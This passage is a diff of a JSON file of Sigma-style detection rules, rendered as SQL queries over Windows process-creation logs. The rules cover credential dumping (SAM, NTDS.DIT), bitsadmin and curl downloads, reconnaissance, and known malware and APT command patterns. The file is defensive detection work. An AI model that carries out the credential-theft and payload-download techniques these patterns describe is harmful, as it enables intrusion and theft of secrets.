Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored", - "author": "frack113", + "title": "Rundll32 With Suspicious Parent Process", + "id": "1723e720-616d-4ddc-ab02-f7e3685a4713", + "status": "experimental", + "description": "Detects suspicious start of rundll32.exe with a parent process of Explorer.exe. Variant of Raspberry Robin, as first reported by Red Canary.", + "author": "CD_ROM_", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\pypykatz.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\python.exe' ESCAPE '\\') AND CommandLine LIKE '%live%' ESCAPE '\\' AND CommandLine LIKE '%registry%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND ParentProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '% C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '% -localserver 22d8c27b-47a1-48d1-ad08-7da7abd79617' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_pypykatz.yml" + "filename": "proc_creation_win_rundll32_parent_explorer.yml" }, { - "title": "Root Certificate Installed From Susp Locations", - "id": "5f6a601c-2ecb-498b-9c33-660362323afa", + "title": "Potential CVE-2022-29072 Exploitation Attempt", + "id": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ee3", "status": "experimental", - "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential exploitation attempts of CVE-2022-29072, a 
7-Zip privilege escalation and command execution vulnerability.\n7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow.\nThe command runs in a child process under the 7zFM.exe process.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1553.004" + "attack.execution", + "cve.2022.29072" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Import-Certificate%' ESCAPE '\\' AND CommandLine LIKE '% -FilePath %' ESCAPE '\\' AND CommandLine LIKE '%Cert:\\\\LocalMachine\\\\Root%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND ParentProcessName LIKE '%\\\\7zFM.exe' ESCAPE '\\') AND NOT (((CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% /k %' ESCAPE '\\' OR CommandLine LIKE '% /r %' ESCAPE '\\')) OR (CommandLine = '')))" ], - "filename": "proc_creation_win_powershell_import_cert_susp_locations.yml" + "filename": "proc_creation_win_exploit_cve_2022_29072_7zip.yml" }, { - "title": "Suspicious WERMGR Process Patterns", - "id": "396f6630-f3ac-44e3-bfc8-1b161bc00c4e", + "title": "PUA - AdvancedRun Suspicious Execution", + "id": "fa00b701-44c6-4679-994d-5a18afa8a707", "status": "experimental", - "description": "Detects suspicious Windows Error Reporting manager 
(wermgr.exe) process patterns - suspicious parents / children, execution folders, command lines etc.", + "description": "Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts", "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%/EXEFilename%' ESCAPE '\\' OR CommandLine LIKE '%/CommandLine%' ESCAPE '\\') AND ((CommandLine LIKE '% /RunAs 8 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 4 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 10 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 11 %' ESCAPE '\\') OR (CommandLine LIKE '%/RunAs 8' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 4' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 10' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 11' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wermgr_susp_child_process.yml" + "filename": "proc_creation_win_pua_advancedrun_priv_user.yml" }, { - "title": "Suspicious RunAs-Like Flag Combination", - "id": 
"50d66fb0-03f8-4da0-8add-84e77d12a020", + "title": "File Download Via Bitsadmin To An Uncommon Target Folder", + "id": "6e30c82f-a9f8-4aab-b79c-7c12bce6f248", "status": "experimental", - "description": "Detects suspicious command line flags that let the user set a target user and command as e.g. seen in PsExec-like tools", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of bitsadmin downloading a file to uncommon target folder", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -u system %' ESCAPE '\\' OR CommandLine LIKE '% --user system %' ESCAPE '\\' OR CommandLine LIKE '% -u NT%' ESCAPE '\\' OR CommandLine LIKE '% -u \"NT%' ESCAPE '\\' OR CommandLine LIKE '% -u ''NT%' ESCAPE '\\' OR CommandLine LIKE '% --system %' ESCAPE '\\' OR CommandLine LIKE '% -u administrator %' ESCAPE '\\') AND (CommandLine LIKE '% -c cmd%' ESCAPE '\\' OR CommandLine LIKE '% -c \"cmd%' ESCAPE '\\' OR CommandLine LIKE '% -c powershell%' ESCAPE '\\' OR CommandLine LIKE '% -c \"powershell%' ESCAPE '\\' OR CommandLine LIKE '% --command cmd%' ESCAPE '\\' OR CommandLine LIKE '% --command powershell%' ESCAPE '\\' OR CommandLine LIKE '% -c whoami%' ESCAPE '\\' OR CommandLine LIKE '% -c wscript%' ESCAPE '\\' OR CommandLine LIKE '% -c cscript%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR 
CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_privilege_escalation_cli_patterns.yml" + "filename": "proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml" }, { - "title": "Potential Product Class Reconnaissance Via Wmic.EXE", - "id": "e568650b-5dcd-4658-8f34-ded0b1e13992", - "status": "experimental", - "description": "Detects the execution of WMIC in order to get a list of firewall and antivirus products", - "author": "Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community", + "title": "TAIDOOR RAT DLL Load", + "id": "d1aa3382-abab-446f-96ea-4de52908210b", + "status": "test", + "description": "Detects specific process characteristics of Chinese TAIDOOR RAT malware load", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1047", - "car.2016-03-002" + "attack.t1055.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%AntiVirusProduct%' ESCAPE '\\' OR CommandLine LIKE '%FirewallProduct%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%dll,MyStart%' ESCAPE '\\' OR CommandLine LIKE '%dll MyStart%' ESCAPE '\\') OR (CommandLine LIKE '% MyStart' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_recon_product_class.yml" + "filename": "proc_creation_win_apt_taidoor.yml" }, { - "title": "Password Protected Compressed File Extraction Via 7Zip", - "id": "b717b8fd-6467-4d7d-b3d3-27f9a463af77", - "status": "experimental", - "description": "Detects usage of 7zip utilities 
(7z.exe, 7za.exe and 7zr.exe) to extract password protected zip files.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Remote Access Tool - ScreenConnect Suspicious Execution", + "id": "75bfe6e6-cd8e-429e-91d3-03921e1d7962", + "status": "test", + "description": "Detects ScreenConnect program starts that establish a remote access to that system (not meeting, not remote support)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.initial_access", + "attack.t1133" ], "falsepositives": [ - "Legitimate activity is expected since extracting files with a password can be common in some environement." + "Legitimate use by administrative staff" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description LIKE '%7-Zip%' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\7z.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7zr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7za.exe' ESCAPE '\\') OR OriginalFileName IN ('7z.exe', '7za.exe')) AND (CommandLine LIKE '% -p%' ESCAPE '\\' AND CommandLine LIKE '% x %' ESCAPE '\\' AND CommandLine LIKE '% -o%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%e=Access&%' ESCAPE '\\' AND CommandLine LIKE '%y=Guest&%' ESCAPE '\\' AND CommandLine LIKE '%&p=%' ESCAPE '\\' AND CommandLine LIKE '%&c=%' ESCAPE '\\' AND CommandLine LIKE '%&k=%' ESCAPE '\\')" ], - "filename": "proc_creation_win_7zip_password_extraction.yml" + "filename": "proc_creation_win_remote_access_tools_screenconnect_access.yml" }, { - "title": "Monitoring Winget For LOLbin Execution", - "id": "313d6012-51a0-4d93-8dfc-de8553239e25", - "status": "experimental", - "description": "Detects usage of winget to install applications via manifest file. Adversaries can abuse winget to download payloads remotely and execute them without touching disk. 
The manifest option enables you to install an application by passing in a YAML file directly to the client. Winget can be used to download and install exe's, msi, msix files later.", - "author": "Sreeman, Florian Roth (Nextron Systems), Frack113", + "title": "Invoke-Obfuscation STDIN+ Launcher", + "id": "6c96fc76-0eb1-11eb-adc1-0242ac120002", + "status": "test", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.t1059" - ], - "falsepositives": [ - "Admin activity installing packages not in the official Microsoft repo. Winget probably won't be used by most users." - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\winget.exe' ESCAPE '\\' OR OriginalFileName = 'winget.exe') AND CommandLine LIKE '%install%' ESCAPE '\\' AND (CommandLine LIKE '%-m %' ESCAPE '\\' OR CommandLine LIKE '%--manifest%' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_lolbin_execution_via_winget.yml" - }, - { - "title": "Enumeration for Credentials in Registry", - "id": "e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1", - "status": "test", - "description": "Adversaries may search the Registry on compromised systems for insecurely stored credentials.\nThe Windows Registry stores configuration information that can be used by the system or other programs.\nAdversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services\n", - "author": "frack113", - "tags": [ - "attack.credential_access", - "attack.t1552.002" + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '% query %' ESCAPE '\\' AND CommandLine 
LIKE '%/t %' ESCAPE '\\' AND CommandLine LIKE '%REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/s%' ESCAPE '\\') AND ((CommandLine LIKE '%/f %' ESCAPE '\\' AND CommandLine LIKE '%HKLM%' ESCAPE '\\') OR (CommandLine LIKE '%/f %' ESCAPE '\\' AND CommandLine LIKE '%HKCU%' ESCAPE '\\') OR CommandLine LIKE '%HKCU\\\\Software\\\\SimonTatham\\\\PuTTY\\\\Sessions%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\')) AND (CommandLine LIKE '%noexit%' ESCAPE '\\' OR (CommandLine LIKE '%input%' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_reg_enumeration_for_credentials_in_registry.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_stdin.yml" }, { - "title": "Suspicious Curl.EXE Download", - "id": "e218595b-bbe7-4ee5-8a96-f32a24ad3468", + "title": "Suspicious Process Patterns NTDS.DIT Exfil", + "id": "8bc64091-6875-4881-aaf9-7bd25b5dda08", "status": "experimental", - "description": "Detects a suspicious curl process start on Windows and outputs the requested document to a local file", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious process patterns used in NTDS.DIT exfiltration", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND ((CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE 
'\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%.dll' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.temp' ESCAPE '\\' OR CommandLine LIKE '%.tmp' ESCAPE '\\' OR CommandLine LIKE '%.txt' ESCAPE '\\' OR CommandLine LIKE '%.vbe' ESCAPE '\\' OR CommandLine LIKE '%.vbs' ESCAPE '\\'))) AND NOT ((ParentProcessName LIKE 'C:\\\\Program Files\\\\Git\\\\usr\\\\bin\\\\sh.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Program Files\\\\Git\\\\mingw64\\\\bin\\\\curl.exe' ESCAPE '\\' AND CommandLine LIKE '%--silent --show-error --output %' ESCAPE '\\' AND CommandLine LIKE '%gfw-httpget-%' ESCAPE '\\' AND CommandLine LIKE '%AppData%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\NTDSDump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\NTDSDumpEx.exe' ESCAPE '\\') OR (CommandLine LIKE '%ntds.dit%' ESCAPE '\\' AND CommandLine LIKE '%system.hiv%' ESCAPE '\\') OR CommandLine LIKE '%NTDSgrab.ps1%' ESCAPE '\\') OR (CommandLine LIKE '%ac i ntds%' ESCAPE '\\' AND CommandLine LIKE '%create full%' ESCAPE '\\') OR (CommandLine LIKE '%/c copy %' ESCAPE '\\' AND CommandLine LIKE '%\\\\windows\\\\ntds\\\\ntds.dit%' ESCAPE '\\') OR (CommandLine LIKE '%activate instance ntds%' ESCAPE '\\' AND CommandLine LIKE '%create full%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%ntds.dit%' ESCAPE '\\')) OR (CommandLine LIKE '%ntds.dit%' ESCAPE '\\' AND ((ParentProcessName LIKE 
'%\\\\apache%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\apache%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tomcat%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_curl_susp_download.yml" + "filename": "proc_creation_win_susp_ntds.yml" }, { - "title": "Pubprn.vbs Proxy Execution", - "id": "1fb76ab8-fa60-4b01-bddd-71e89bf555da", + "title": "Suspicious Group And Account Reconnaissance Activity Using Net.EXE", + "id": "d95de845-b83c-4a9a-8a6a-4fc802ebf6c0", "status": "experimental", - "description": "Detects the use of the 'Pubprn.vbs' Microsoft signed script to execute commands.", - "author": "frack113", + "description": "Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE", + "author": "Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1216.001" + "attack.discovery", + "attack.t1087.001", + "attack.t1087.002" ], "falsepositives": [ - "Unknown" + "Inventory tool runs", + "Administrative activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\pubprn.vbs%' ESCAPE '\\' AND CommandLine LIKE '%script:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND ((((CommandLine LIKE 
'% group %' ESCAPE '\\' OR CommandLine LIKE '% localgroup %' ESCAPE '\\') AND (CommandLine LIKE '%domain admins%' ESCAPE '\\' OR CommandLine LIKE '% administrator%' ESCAPE '\\' OR CommandLine LIKE '% administrateur%' ESCAPE '\\' OR CommandLine LIKE '%enterprise admins%' ESCAPE '\\' OR CommandLine LIKE '%Exchange Trusted Subsystem%' ESCAPE '\\' OR CommandLine LIKE '%Remote Desktop Users%' ESCAPE '\\' OR CommandLine LIKE '%Utilisateurs du Bureau à distance%' ESCAPE '\\' OR CommandLine LIKE '%Usuarios de escritorio remoto%' ESCAPE '\\' OR CommandLine LIKE '% /do%' ESCAPE '\\')) AND NOT (CommandLine LIKE '% /add%' ESCAPE '\\')) OR (CommandLine LIKE '% accounts %' ESCAPE '\\' AND CommandLine LIKE '% /do%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_pubprn.yml" + "filename": "proc_creation_win_net_groups_and_accounts_recon.yml" }, { - "title": "Add New Windows Capability - ProcCreation", - "id": "b36d01a3-ddaf-4804-be18-18a6247adfcd", + "title": "Suspicious PowerShell Child Processes", + "id": "e4b6d2a7-d8a4-4f19-acbd-943c16d90647", "status": "experimental", - "description": "Detects usage of the \"Add-WindowsCapability\" cmdlet to add new windows capabilities. Notable capabilities could be \"OpenSSH\" and others.", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.execution" - ], + "description": "Detects suspicious child processes spawned by PowerShell", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "falsepositives": [ - "Legitimate usage of the capabilities by administartors or users. 
Filter accordingly" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%Add-WindowsCapability%' ESCAPE '\\' AND CommandLine LIKE '%OpenSSH.%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\')) AND NOT ((ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkspacesConfig\\\\Scripts\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkspacesConfig\\\\Scripts\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_add_windows_capability.yml" + "filename": "proc_creation_win_powershell_susp_child_processes.yml" }, { - "title": "Disabled IE Security Features", - "id": "fb50eb7a-5ab1-43ae-bcc9-091818cb8424", + "title": "Fake Instance Of Hxtsr.exe", + 
"id": "4e762605-34a8-406d-b72e-c1a089313320", "status": "test", - "description": "Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features", - "author": "Florian Roth (Nextron Systems)", + "description": "HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook Communications.\nHxTsr.exe is part of Outlook apps, because it resides in a hidden \"WindowsApps\" subfolder of \"C:\\Program Files\".\nIts path includes a version number, e.g., \"C:\\Program Files\\WindowsApps\\microsoft.windowscommunicationsapps_17.7466.41167.0_x64__8wekyb3d8bbwe\\HxTsr.exe\".\nAny instances of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe\n", + "author": "Sreeman", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1036" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '% -name IEHarden %' ESCAPE '\\' AND CommandLine LIKE '% -value 0 %' ESCAPE '\\') OR (CommandLine LIKE '% -name DEPOff %' ESCAPE '\\' AND CommandLine LIKE '% -value 1 %' ESCAPE '\\') OR (CommandLine LIKE '% -name DisableFirstRunCustomize %' ESCAPE '\\' AND CommandLine LIKE '% -value 2 %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName = 'hxtsr.exe' AND NOT (CurrentDirectory LIKE 'C:\\\\program files\\\\windowsapps\\\\microsoft.windowscommunicationsapps\\_%' ESCAPE '\\' AND CurrentDirectory LIKE '%\\\\hxtsr.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_disable_ie_features.yml" + "filename": "proc_creation_win_hxtsr_masquerading.yml" }, { - "title": "MERCURY APT Activity", - "id": "a62298a3-1fe0-422f-9a68-ffbcbc5a123d", + "title": "Remote File Download via Desktopimgdownldr Utility", + "id": "214641c2-c579-4ecb-8427-0cf19df6842e", "status": "experimental", - "description": 
"Detects suspicious command line patterns seen being used by MERCURY APT", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the desktopimgdownldr utility being used to download a remote file. An adversary may use desktopimgdownldr to download arbitrary files as an alternative to certutil.", + "author": "Tim Rauch", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.g0069" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-exec bypass -w 1 -enc%' ESCAPE '\\' AND CommandLine LIKE '%UwB0AGEAcgB0AC0ASgBvAGIAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAHsAKABzAGEAcABzACAAKAAiAHAA%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\desktopimgdownldr.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\desktopimgdownldr.exe' ESCAPE '\\' AND CommandLine LIKE '%/lockscreenurl:http%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_mercury.yml" + "filename": "proc_creation_win_desktopimgdownldr_remote_file_download.yml" }, { - "title": "AADInternals PowerShell Cmdlets Execution - ProccessCreation", - "id": "c86500e9-a645-4680-98d7-f882c70c1ea3", + "title": "HackTool - SysmonEOP Execution", + "id": "8a7e90c5-fe6e-45dc-889e-057fe4378bd9", "status": "experimental", - "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. 
Which can be abused by threat actors to attack Azure AD or Office 365.", - "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.reconnaissance", - "attack.discovery", - "attack.credential_access", - "attack.impact" + "cve.2022.41120", + "attack.t1068", + "attack.privilege_escalation" ], "falsepositives": [ - "Legitimate use of the library for administrative activity" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.Exe', 'pwsh.dll')) AND (CommandLine LIKE '%Add-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-AADInt%' 